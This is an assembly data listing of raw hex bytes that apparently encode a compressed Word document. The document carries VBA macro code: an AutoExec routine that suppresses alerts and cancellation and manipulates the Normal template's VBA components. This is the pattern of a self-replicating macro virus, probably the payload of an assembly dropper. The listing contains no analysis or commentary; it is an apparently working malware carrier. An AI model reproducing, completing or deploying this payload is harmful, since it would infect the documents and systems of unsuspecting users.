DB 04EH,003H,003H,01FH,0D5H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH
DB 0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00BH,010H,07DH,0BDH,0E7H,0B4H,003H,0E2H,049H,0F3H
DB 054H,0F3H,0B4H,0F3H,0B0H,0E3H,0FFH,0FEH,002H,029H,009H,002H,018H,0E3H,0D0H
DB 0F3H,030H,0F3H,088H,00DH,002H,010H,0DEH,07AH,00EH,002H,004H,0F3H,0E4H,003H
DB 020H,0F3H,0D4H,012H,002H,010H,0F3H,0BCH,014H,002H,008H,015H,002H,004H,0F3H
DB 0C0H,0F3H,0E4H,003H,020H,019H,055H,05BH,002H,010H,01AH,002H,004H,01BH,002H
DB 004H,01CH,002H,004H,01DH,002H,004H,0F3H,05FH,01FH,002H,008H,003H,020H,0FDH
DB 002H,064H,022H,0ADH,0AAH,002H,00CH,028H,002H,004H,003H,010H,025H,002H,008H
DB 026H,002H,004H,027H,002H,004H,029H,002H,004H,031H,002H,004H,02AH,002H,004H
DB 0AAH,0FAH,02BH,002H,004H,02CH,002H,004H,02DH,002H,004H,02EH,002H,004H,02FH
DB 002H,004H,030H,002H,004H,003H,034H,003H,004H,002H,047H,00FH,003H,0FFH,0FFH
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,047H,000H,00FH,010H,00FH,010H,004H,010H,052H,000H,06FH,002H,002H
DB 074H,000H,020H,000H,045H,000H,06EH,000H,074H,010H,000H,000H,072H,000H,079H
DB 012H,056H,020H,050H,072H,06FH,067H,072H,061H,06DH,061H,073H,000H,000H,008H
DB 041H,052H,051H,055H,049H,056H,07EH,031H,000H,028H,000H,013H,08CH,000H,000H
DB 028H,026H,000H,000H,0D1H,023H,010H,000H,04DH,069H,063H,072H,06FH,073H,06FH
DB 066H,016H,000H,005H,001H,047H,024H,004H,049H,002H,005H,023H,044H,006H,009H
DB 002H,002H,040H,000H,000H,0C0H,004H,006H,000H,046H,003H,007H,0A2H,0D8H,000H
DB 080H,008H,000H,02BH,030H,030H,09DH,0C0H,0B1H,0E1H,09BH,0B8H,065H,0BEH,001H
DB 024H,002H,015H,006H,040H,040H,023H,021H,002H,008H,031H,000H,054H,000H,061H
DB 000H,062H,000H,06CH,000H,065H,002H,00EH,026H,000H,080H,04DH,017H,011H,000H
DB 041H,072H,071H,075H,069H,076H,06FH,073H,020H,064H,065H,00FH,088H,081H,001H
DB 00FH,088H,010H,000H,00EH,000H,002H,000H,002H,07BH,008H,003H,000H,04DH,049H
DB 043H,052H,04FH,053H,050H,000H,07EH,032H,000H,01EH,008H,0B0H,0DAH,003H,0B0H
DB 06FH,064H,065H,06CH,06FH,073H,000H,04DH,04FH,008H,020H,044H,045H,008H,002H
DB 06AH,000H,010H,000H,000H,026H,003H,000H,0F0H,057H,002H,0FEH,072H,000H,008H
DB 07EH,064H,000H,044H,002H,008H,063H,000H,075H,000H,06DH,002H,088H,013H,008H
DB 003H,023H,00FH,004H,00FH,010H,003H,010H,01AH,0F8H,047H,000H,002H,001H,033H
DB 034H,007H,081H,003H,014H,00FH,004H,00FH,010H,004H,010H,002H,080H,003H,008H
DB 005H,000H,053H,004H,076H,06DH,0ABH,0EAH,012H,006H,013H,07CH,049H,012H,086H
DB 066H,002H,08CH,072H,002H,08AH,061H,012H,090H,069H,002H,00CH,06EH,003H,029H
DB 00FH,004H,006H,010H,0FEH,0E3H,028H,002H,080H,013H,072H,033H,0BCH,003H,084H
DB 006H,017H,00FH,007H,00CH,010H,004H,07BH,004H,005H,000H,000H,005H,00FH,0FAH
DB 00FH,090H,00FH,090H,0FDH,056H,00EH,090H,038H,002H,080H,003H,078H,007H,004H
DB 00CH,069H,00FH,00DH,006H,010H,018H,003H,008H,006H,080H,04DH,002H,0F8H,063H
DB 022H,076H,06FH,07CH,0F4H,000H,073H,003H,016H,00FH,004H,00FH,010H,00FH,010H
DB 022H,000H,001H,001H,001H,002H,016H,00CH,002H,004H,043H,0A4H,002H,007H,00FH
DB 003H,010H,083H,000H,080H,092H,064H,024H,078H,0A0H,010H,0DAH,004H,008H,00BH
DB 021H,056H,000H,042H,000H,041H,00BH,011H,0C7H,0C7H,00FH,00CH,00FH,010H,00EH
DB 010H,008H,000H,001H,028H,080H,053H,034H,00EH,01FH,004H,00FH,007H,080H,0C0H
DB 047H,0C9H,00FH,080H,022H,0FEH,0E8H,0FFH,068H,000H,069H,002H,0FCH,044H,012H
DB 058H,02FH,080H,004H,03DH,00FH,005H,00EH,010H,023H,080H,053H,0A4H,023H,0D4H
DB 013H,084H,00EH,01FH,00FH,00FH,0FDH,0FFH,008H,010H,096H,053H,0E5H,002H,00EH
DB 013H,03CH,023H,040H,033H,0BCH,023H,044H,023H,0CCH,003H,01BH,003H,0CCH,003H
DB 054H,003H,05CH,06FH,000H,067H,000H,013H,0C3H,0BFH,0EAH,06FH,000H,06BH,000H
DB 013H,0E8H,067H,000H,053H,0A4H,06FH,000H,020H,002H,080H,021H,002H,004H,022H
DB 002H,004H,023H,002H,004H,043H,018H,06BH,000H,05FH,055H,063H,014H,063H,004H
DB 06FH,000H,06BH,000H,043H,094H,032H,002H,03CH,033H,002H,004H,034H,002H,004H
DB 035H,002H,004H,036H,002H,004H,037H,055H,055H,002H,004H,038H,002H,004H,039H
DB 002H,004H,03AH,002H,004H,03BH,002H,004H,03CH,002H,004H,03DH,002H,004H,03EH
DB 002H,004H,03FH,0ADH,05AH,002H,004H,040H,002H,004H,013H,0FCH,042H,002H,008H
DB 043H,002H,004H,044H,002H,004H,045H,002H,004H,043H,0B5H,047H,002H,008H,048H
DB 0ABH,0AAH,002H,004H,003H,0B8H,04AH,002H,008H,04BH,002H,004H,04CH,002H,004H
DB 04DH,002H,004H,04EH,002H,004H,04FH,002H,004H,050H,002H,004H,0EAH,0AAH,051H
DB 002H,004H,052H,002H,004H,053H,002H,004H,003H,02CH,003H,004H,056H,002H,00CH
DB 057H,002H,004H,058H,002H,004H,059H,002H,004H,0F6H,07FH,05AH,002H,004H,003H
DB 018H,05CH,006H,008H,013H,0A8H,00FH,004H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,007H,010H,001H,0E0H,0FCH,016H,001H,000H
DB 001H,0B6H,022H,0C3H,034H,046H,002H,008H,0FFH,0FFH,002H,0A6H,004H,008H,005H
DB 00AH,003H,00EH,00FH,004H,00FH,010H,0BFH,055H,00BH,010H,023H,015H,023H,04DH
DB 023H,049H,023H,045H,008H,069H,001H,023H,04FH,003H,00EH,078H,002H,02FH,0DEH
DB 002H,004H,0F7H,022H,078H,0F5H,00FH,0D8H,022H,080H,003H,014H,002H,00FH,032H
DB 049H,000H,000H,08DH,09AH,08FH,09AH,000H,002H,07EH,023H,00FH,088H,002H,015H
DB 003H,034H,0AFH,01DH,002H,007H,00FH,003H,009H,010H,003H,0A5H,013H,002H,070H
DB 0D6H,002H,013H,003H,004H,0EBH,023H,0C5H,002H,041H,003H,018H,000H,000H,0DFH
DB 0F3H,07FH,002H,00AH,002H,019H,000H,00CH,002H,008H,003H,067H,00FH,004H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,009H,010H,023H,0CCH
DB 002H,028H,085H,000H,053H,04CH,003H,012H,000H,002H,0EBH,053H,010H,008H,00AH
DB 094H,005H,00AH,000H,000H,002H,03CH,005H,00AH,004H,054H,0FFH,0FFH,015H,08DH
DB 001H,000H,04EH,000H,030H,000H,07BH,002H,004H,030H,002H,004H,032H,002H,004H
DB 039H,0B1H,01EH,002H,004H,036H,000H,02DH,002H,006H,003H,012H,030H,00CH,00AH
DB 043H,006H,016H,009H,01EH,005H,024H,005H,006H,034H,000H,036H,000H,08CH,000H
DB 07DH,000H,019H,0A2H,0DDH,036H,002H,000H,0DFH,033H,0E1H,013H,086H,001H,001H
DB 080H,012H,01EH,0CCH,03FH,002H,081H,023H,09DH,003H,07BH,0FFH,0FFH,003H,0A7H
DB 013H,080H,002H,017H,004H,003H,005H,016H,015H,04DH,093H,0BBH,033H,0A3H,00CH
DB 011H,07CH,0FAH,01AH,002H,00BH,018H,00FH,00CH,003H,039H,007H,014H,003H,008H
DB 00DH,000H,0A3H,035H,094H,003H,017H,004H,004H,093H,0B7H,003H,018H,003H,004H
DB 0DFH,0FFH,003H,011H,022H,081H,002H,007H,022H,009H,002H,006H,000H,002H,0C5H
DB 003H,080H,003H,01CH,005H,076H,003H,00AH,00FH,032H,003H,014H,00BH,004H,004H
DB 039H,002H,005H,00FH,0FDH,007H,014H,002H,00BH,01FH,0F1H,007H,01BH,0FFH,002H
DB 000H,070H,002H,01FH,04DH,032H,0E8H,005H,013H,002H,00DH,002H,02CH,005H,006H
DB 015H,077H,01FH,0E1H,003H,00CH,00FH,004H,00FH,010H,00FH,010H,007H,010H,0FEH
DB 0CAH,001H,002H,0EEH,022H,081H,008H,000H,013H,064H,004H,016H,002H,00CH,0DFH
DB 0FFH,023H,094H,024H,0CAH,002H,00CH,053H,04DH,033H,024H,000H,002H,00CH,063H
DB 0B5H,053H,005H,003H,00CH,0B3H,015H,003H,0E8H,003H,00CH,043H,0A9H,043H,05DH
DB 003H,00CH,0DDH,0A2H,003H,030H,090H,003H,049H,002H,030H,0B3H,019H,0A0H,006H
DB 00CH,003H,018H,0C8H,003H,00CH,080H,008H,000H,003H,060H,0D8H,002H,00CH,026H
DB 03EH,004H,002H,024H,032H,055H,000H,0E0H,002H,00CH,000H,080H,009H,003H,006H
DB 002H,0DCH,012H,048H,00AH,00CH,003H,0F6H,001H,001H,012H,004H,0F0H,002H,01CH
DB 08FH,004H,004H,070H,000H,0C1H,000H,01CH,002H,013H,014H,0AFH,000H,020H,000H
DB 01EH,060H,028H,002H,028H,000H,020H,002H,002H,01DH,002H,003H,020H,000H,024H
DB 002H,005H,012H,022H,004H,012H,0F7H,000H,080H,080H,020H,000H,026H,002H,0F6H
DB 000H,0A4H,022H,0BFH,020H,000H,028H,002H,021H,000H,02AH,002H,004H,082H,009H
DB 02CH,002H,004H,02EH,002H,08BH,000H,000H,004H,018H,005H,01CH,026H,002H,007H
DB 020H,025H,000H,02CH,002H,000H,000H,001H,000H,021H,000H,030H,002H,025H,000H
DB 032H,002H,002H,000H,0AEH,000H,008H,000H,000H,0A8H,027H,043H,06FH,063H,061H
DB 069H,06EH,065H,005H,000H,094H,0A2H,020H,093H,002H,07EH,067H,032H,0A1H,08CH
DB 040H,053H,000H,007H,060H,0A3H,03BH,00CH,000H,058H,002H,02CH,00EH,000H,063H
DB 03AH,05CH,063H,005H,02EH,02EH,030H,020H,073H,079H,073H,01DH,002H,082H,009H
DB 078H,042H,040H,034H,002H,001H,000H,040H,004H,014H,042H,040H,06BH,00FH,022H
DB 0D8H,092H,0BBH,063H,092H,033H,09BH,002H,052H,013H,056H,06CH,002H,0FCH,063H
DB 083H,003H,0F2H,013H,072H,001H,0A7H,0B1H,000H,000H,000H,041H,074H,074H,072H
DB 069H,062H,075H,074H,000H,065H,020H,056H,042H,05FH,04EH,061H,081H,000H,092H
DB 0EFH,020H,03DH,020H,022H,054H,068H,072H,084H,044H,06FH,063H,075H,06DH,065H
DB 06EH,010H,000H,000H,074H,022H,00DH,00AH,00AH,08CH,042H,061H,073H,001H,002H
DB 08CH,030H,07BH,030H,030H,000H,000H,030H,032H,030H,050H,039H,030H,036H,02DH
DB 000H,010H,030H,003H,008H,043H,007H,000H,000H,000H,014H,002H,012H,001H,024H
DB 030H,030H,034H,036H,07DH,001H,00DH,07CH,043H,072H,065H,000H,000H,061H,074H
DB 061H,062H,082H,06CH,001H,086H,046H,061H,06CH,073H,065H,00CH,05EH,000H,000H
DB 000H,050H,072H,065H,064H,065H,063H,06CH,061H,089H,000H,006H,049H,064H,000H
DB 08BH,054H,000H,000H,072H,075H,00DH,022H,040H,045H,078H,070H,06FH,073H,065H
DB 014H,01CH,054H,000H,065H,000H,000H,06DH,070H,06CH,061H,074H,065H,044H,030H
DB 065H,072H,069H,076H,002H,024H,011H,065H,000H,000H,043H,075H,0C0H,073H,074H
DB 06FH,06DH,069H,07AH,004H,088H,003H,032H,000H,053H,075H,000H,000H,062H,020H
DB 041H,075H,074H,06FH,000H,045H,078H,065H,063H,028H,029H,00DH,00AH,000H,000H
DB 000H,04FH,06EH,020H,045H,072H,072H,06FH,072H,080H,020H,047H,06FH,054H,06FH
DB 020H,065H,000H,000H,000H,005H,001H,080H,055H,070H,070H,06CH,069H,063H,061H
DB 074H,080H,069H,06FH,06EH,000H,000H,02EH,044H,069H,073H,000H,035H,080H,079H
DB 041H,06CH,065H,072H,074H,073H,000H,055H,000H,000H,013H,005H,034H,008H,011H
DB 045H,06EH,081H,030H,043H,061H,06EH,040H,063H,065H,06CH,000H,000H,04BH,065H
DB 079H,000H,012H,077H,086H,064H,000H,01BH,001H,00AH,064H,00DH,00AH,046H,000H
DB 000H,080H,02DH,012H,069H,080H,009H,031H,020H,080H,02FH,04EH,06FH,072H,008H
DB 06DH,061H,000H,000H,06CH,005H,05FH,02EH,056H,042H,050H,040H,072H,06FH,06AH
DB 065H,063H,074H,080H,004H,000H,000H,043H,020H,06FH,06DH,070H,06FH,06EH,080H
DB 0C5H,073H,02EH,000H,043H,06FH,075H,06EH,000H,000H,074H,00DH,00AH,049H,044H
DB 066H,020H,0A2H,017H,028H,069H,029H,000H,019H,064H,000H,000H,004H,065H,04DH
DB 06FH,064H,075H,06CH,065H,02EH,000H,04CH,012H,0C5H,073H,028H,031H,02CH,008H
DB 040H,000H,020H,031H,029H,000H,03BH,022H,012H,0D8H,004H,063H,061H,080H,004H
DB 022H,020H,054H,068H,000H,000H,065H,002H,06EH,089H,039H,04EH,065H,078H,074H
DB 020H,069H,014H,00DH,00AH,023H,025H,000H,042H,049H,080H,027H,072H,074H,020H
DB 040H,028H,022H,013H,0D1H,083H,014H,02EH,030H,012H,0CEH,022H,000H,000H,0C0H
DB 050H,00CH,010H,053H,061H,006H,076H,040H,073H,081H,052H,03AH,00DH,00AH,045H
DB 000H,000H,06EH,024H,064H,020H,0C0H,05CH,00DH,00AH,041H,000H,0D0H,0CFH,011H
DB 0E0H,0A1H,0B1H,008H,008H,01AH,0E1H,000H,00EH,001H,03EH,000H,003H,000H,0FEH
DB 0FFH,009H,039H,05DH,000H,0CCH,061H,05EH,081H,00CH,053H,04FH,0FFH,016H,004H
DB 000H,000H,009H,002H,004H,0E4H,004H,047H,049H,003H,017H,005H,000H,002H,000H
DB 000H,0AEH,02CH,001H,02AH,000H,05CH,000H,047H,000H,07BH,042H,05BH,053H,00CH
DB 053H,048H,034H,0C2H,0EEH,046H,05CH,03EH,0F3H,020H,003H,01AH,003H,004H,02DH
DB 000H,05FH,048H,003H,016H,009H,004H,055H,048H,023H,000H,033H,000H,02EH,002H
DB 050H,023H,000H,028H,000H,039H,000H,023H,002H,032H,03AH,002H,062H,041H,000H
DB 052H,000H,051H,000H,055H,000H,049H,000H,0A8H,00AH,056H,000H,04FH,0B2H,046H
DB 020H,0B2H,05AH,045H,022H,09DH,050H,002H,018H,04FH,002H,080H,052H,000H,041H
DB 000H,05AH,055H,04DH,002H,004H,053H,00FH,02CH,004H,02CH,043H,002H,034H,04DH
DB 002H,03EH,04EH,002H,00EH,05CH,002H,028H,049H,002H,056H,052H,055H,0B5H,002H
DB 014H,053H,002H,004H,046H,0A2H,026H,020H,002H,018H,048H,002H,03EH,052H,002H
DB 0BAH,044H,002H,042H,0A5H,0B8H,05CH,002H,06CH,02AH,0BAH,042H,002H,016H,033H
DB 002H,090H,032H,002H,092H,044H,000H,04CH,002H,002H,023H,002H,016H,022H,0D0H
DB 0C2H,058H,061H,0D2H,058H,0A2H,08AH,020H,0A2H,0E2H,061H,000H,073H,0A2H,066H
DB 063H,002H,08EH,046H,0A2H,068H,072H,002H,008H,041H,000H,070H,002H,002H,098H
DB 0FAH,06CH,000H,05FH,002H,02CH,003H,042H,05FH,000H,005H,0A8H,04AH,002H,060H
DB 043H,002H,070H,01EH,079H,00FH,00FH,008H,010H,0A2H,080H,0BFH,0EAH,032H,067H
DB 033H,063H,005H,004H,008H,019H,00FH,009H,00AH,010H,01BH,002H,00CH,07AH,0B6H
DB 0ADH,064H,002H,098H,072H,002H,010H,00FH,003H,00FH,010H,0FBH,0E5H,00FH,010H
DB 007H,010H,008H,012H,0E2H,005H,07AH,005H,006H,007H,018H,00FH,008H,00BH,010H
DB 049H,002H,00DH,084H,002H,002H,005H,002H,003H,00DH,0F6H,078H,0EFH,077H,000H
DB 06DH,002H,014H,00FH,003H,00FH,010H,00BH,010H,014H,00FH,080H,00BH,01DH,00FH
DB 00CH,006H,010H,054H,002H,008H,0A3H,0D8H,002H,007H,05FH,07FH,01FH,076H,003H
DB 013H,00FH,004H,00FH,010H,00CH,010H,010H,0D2H,080H,006H,002H,012H,063H,00FH
DB 013H,002H,002H,00BH,00FH,003H,00FH,010H,022H,066H,000H,044H,0D5H,000H,052H
DB 036H,027H,069H,000H,063H,0D2H,082H,074H,012H,086H,06FH,0D2H,0EAH,073H,00CH
DB 02CH,020H,03FH,03AH,022H,0F2H,0FDH,005H,083H,082H,035H,03FH,03AH,002H,018H
DB 083H,08CH,03FH,03AH,039H,036H,003H,00AH,037H,03AH,038H,022H,0A8H,030H,000H
DB 023H,000H,034H,023H,0A2H,002H,036H,03BH,03EH,072H,000H,071H,022H,0B2H,069H
DB 000H,076H,022H,0A2H,073H,000H,020H,0F2H,094H,065H,002H,006H,0EAH,045H,050H
DB 0E4H,01CH,067H,002H,006H,061H,012H,09CH,023H,0C8H,033H,01EH,003H,0B6H,072H
DB 004H,028H,06FH,000H,066H,052H,0F3H,020H,0ADH,01AH,032H,026H,066H,002H,00AH
DB 003H,018H,065H,032H,01EH,04FH,002H,00CH,066H,002H,0D4H,063H,062H,013H,003H
DB 030H,053H,000H,057H,0ADH,056H,002H,022H,052H,032H,092H,003H,07EH,04FH,032H
DB 024H,042H,002H,082H,04DH,004H,022H,00DH,048H,057H,002H,056H,072H,002H,07CH
DB 020H,00AH,056H,000H,003H,02AH,030H,002H,082H,04FH,000H,062H,000H,06AH,002H
DB 048H,063H,05BH,020H,002H,03AH,069H,002H,010H,072H,0A7H,0FEH,012H,034H,0F3H
DB 0AEH,01BH,02FH,0B8H,000H,04FH,068H,030H,002H,0E4H,033H,002H,0E6H,099H,092H
DB 00BH,00AH,01FH,02EH,013H,024H,009H,004H,017H,02EH,0A7H,01AH,033H,0D6H,013H
DB 02EH,003H,004H,043H,000H,043H,068H,057H,042H,062H,04EH,002H,0CAH,04FH,002H
DB 0D4H,043H,04CH,053H,000H,059H,055H,0EDH,042H,01CH,054H,032H,0B8H,04DH,002H
DB 0FAH,053H,032H,0BCH,044H,002H,0ECH,04CH,002H,010H,003H,03CH,054H,002H,0B2H
DB 003H,0ECH,003H,0F4H,0D5H,005H,043H,08EH,041H,012H,064H,074H,002H,0E4H,06DH
DB 002H,0C2H,017H,0F6H,00BH,0C6H,0E0H,008H,0C6H,041H,000H,046H,000H,035H,054H
DB 0D5H,000H,031H,002H,0C4H,031H,0A2H,03CH,032H,012H,0F4H,042H,012H,014H,035H
DB 042H,06AH,02DH,002H,016H,031H,002H,082H,005H,014H,0AAH,0EDH,043H,052H,004H
DB 044H,002H,01EH,034H,002H,02AH,034H,002H,032H,003H,022H,035H,002H,00CH,007H
DB 0CCH,07DH,012H,06AH,003H,08AH,003H,0C2H,06BH,0A3H,003H,004H,00FH,0C6H,057H
DB 002H,0BEH,05CH,002H,004H,00BH,0C6H,04DH,002H,010H,045H,0AAH,06DH,000H,073H
DB 022H,030H,054H,002H,0ECH,036H,037H,044H,002H,048H,01FH,0B2H,074H,012H,0A0H
DB 009H,028H,020H,000H,005H,068H,023H,00EH,01FH,0B4H,062H,024H,042H,01DH,0B4H
DB 001H,000H,0AAH,056H,0E4H,008H,0EEH,033H,052H,070H,032H,002H,0D4H,044H,002H
DB 0F6H,038H,002H,048H,063H,008H,046H,012H,044H,037H,002H,0DAH,031H,055H,0EBH
DB 002H,0F0H,044H,004H,014H,042H,002H,026H,041H,002H,0DCH,02DH,002H,004H,003H
DB 0F0H,035H,002H,0F0H,033H,002H,004H,023H,0CCH,005H,0F0H,06FH,0DBH,00FH,0EEH
DB 00FH,0EEH,005H,0EEH,015H,0AEH,050H,012H,0B0H,053H,0C8H,045H,002H,008H,00FH
DB 0F2H,045H,092H,001H,00FH,0F2H,06FH,022H,0D6H,00FH,0F2H,007H,000H,00FH,0F2H
DB 02FH,0A6H,00FH,0F2H,000H,000H,0E1H,02EH,045H,00DH,08FH,0E0H,01AH,010H,085H
DB 02EH,002H,000H,056H,060H,08CH,04DH,00BH,0B4H,000H,000H,01CH,001H,027H,0BAH
DB 013H,002H,046H,012H,0E6H,044H,022H,0B6H,034H,055H,0D5H,002H,0ECH,02DH,002H
DB 0DCH,042H,012H,012H,041H,014H,006H,030H,012H,008H,042H,002H,00AH,042H,012H
DB 028H,045H,002H,01AH,025H,0CEH,0AEH,05FH,041H,062H,080H,003H,0FCH,013H,010H
DB 044H,012H,032H,035H,012H,02AH,01FH,006H,015H,006H,07FH,022H,07FH,022H,07BH
DB 022H,04DH,022H,0E6H,043H,0EBH,055H,074H,03AH,079H,002H,04FH,002H,08AH,046H
DB 004H,018H,013H,032H,00DH,00EH,013H,040H,04FH,022H,08AH,037H,022H,02EH,044H
DB 022H,0F4H,04CH,06FH,017H,02FH,02EH,016H,03CH,04BH,01AH,03FH,0E4H,065H,052H
DB 00CH,013H,060H,04CH,042H,018H,02FH,030H,035H,024H,001H,052H,0EEH,003H,000H
DB 004H,050H,0FFH,002H,000H,000H,006H,0A2H,07BH,008H,002H,008H,016H,0D6H,00BH
DB 003H,020H,0B2H,069H,0D6H,062H,053H,08AH,00FH,004H,00FH,010H,00FH,010H,03DH
DB 0A8H,005H,010H,000H,074H,04EH,056H,09DH,003H,055H,008H,004H,08DH,09AH,001H
DB 000H,018H,032H,0DEH,068H,002H,09EH,073H,012H,082H,02AH,000H,06FH,002H,0AEH
DB 075H,052H,014H,065H,052H,0B8H,074H,000H,00AH,000H,032H,033H,036H,064H,064H
DB 061H,008H,06FH,032H,031H,039H,092H,024H,02AH,044H,001H,011H,002H,099H,0F3H
DB 04CH,004H,040H,002H,0A9H,000H,0F3H,01AH,005H,064H,001H,0FEH,0FFH,001H,0B3H
DB 0E3H,005H,00CH,00FH,006H,00FH,010H,00FH,010H,002H,0E4H,002H,04DH,00FH,016H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH
DB 0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,01FH,000H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,003H,010H
DB 0A3H,098H,0C6H,077H,092H,0D1H,0D2H,011H,0BCH,0A4H,044H,0BCH,006H,045H,053H
DB 082H,093H,003H,014H,023H,078H,003H,008H,060H,022H,036H,080H,002H,004H,043H
DB 01CH,01DH,000H,0FFH,000H,020H,000H,000H,028H,000H,000H,004H,004H,057H,06FH
DB 072H,064H,0B5H,06BH,010H,000H,003H,004H,056H,000H,080H,042H,041H,0F7H,0E2H
DB 010H,000H,005H,004H,057H,069H,06EH,031H,036H,0C1H,07EH,006H,00BH,010H,000H
DB 033H,032H,007H,07FH,003H,01FH,04DH,061H,063H,0B3H,0B2H,010H,000H,008H,004H
DB 050H,072H,001H,000H,0C2H,054H,074H,06FH,031H,03AH,071H,010H,000H,006H,004H
DB 073H,074H,064H,06FH,06CH,065H,000H,000H,093H,060H,010H,000H,007H,000H,04DH
DB 053H,046H,06FH,072H,06DH,073H,043H,00FH,010H,028H,010H,000H,00CH,004H,0D2H
DB 07FH,073H,0D6H,07EH,074H,03CH,09EH,010H,000H,009H,002H,07CH,0FFH,003H,004H
DB 080H,004H,000H,05FH,045H,076H,061H,06CH,075H,0D2H,02DH,018H,0D9H,003H,040H
DB 04FH,066H,066H,069H,063H,000H,043H,065H,015H,075H,010H,000H,00FH,004H,054H
DB 0D6H,047H,004H,062H,063H,074H,081H,045H,002H,055H,004H,084H,045H,04DH,0F3H
DB 0C2H,099H,06FH,031H,0D4H,012H,003H,07CH,0D3H,045H,045H,0D2H,044H,0ECH,09CH
DB 010H,002H,0BCH,065H,001H,0E3H,0D2H,042H,051H,05BH,010H,000H,00BH,000H,041H
DB 0D6H,03BH,0D2H,03AH,0A5H,02AH,010H,0F2H,0AEH,0D2H,03FH,0D2H,092H,009H,018H
DB 0D6H,03FH,0F4H,0F6H,002H,05EH,000H,045H,06EH,061H,062H,06CH,065H,0D2H,040H
DB 0D5H,03FH,0EAH,0F3H,010H,019H,000H,032H,061H,077H,064H,002H,02AH,003H,018H
DB 064H,0FCH,0D3H,010H,000H,001H,000H,069H,060H,010H,010H,038H,00DH,000H,00EH
DB 000H,0D2H,045H,0D2H,044H,007H,090H,071H,0ACH,002H,0BFH,000H,0D2H,04FH,003H
DB 0FAH,063H,074H,04FH,068H,00BH,094H,002H,0E0H,002H,00FH,043H,0D4H,053H,065H
DB 06EH,074H,073H,00AH,027H,012H,02DH,000H,0D4H,058H,030H,076H,003H,057H,0C8H
DB 024H,043H,06FH,064H,0D6H,052H,0E1H,01CH,003H,01BH,0D4H,056H,0BAH,0CEH,002H
DB 0F1H,000H,049H,0D2H,088H,072H,074H,004H,06CH,069H,0C5H,002H,0C1H,000H,053H
DB 061H,076H,065H,092H,0D0H,003H,0D9H,017H,02AH,06AH,002H,086H,032H,0E5H,001H
DB 0F6H,0BBH,001H,012H,0BDH,0E2H,095H,004H,042H,03AH,047H,08EH,013H,0C4H,005H
DB 004H,0A2H,01FH,002H,018H,002H,03FH,0B4H,005H,01DH,006H,006H,00CH,002H,01FH
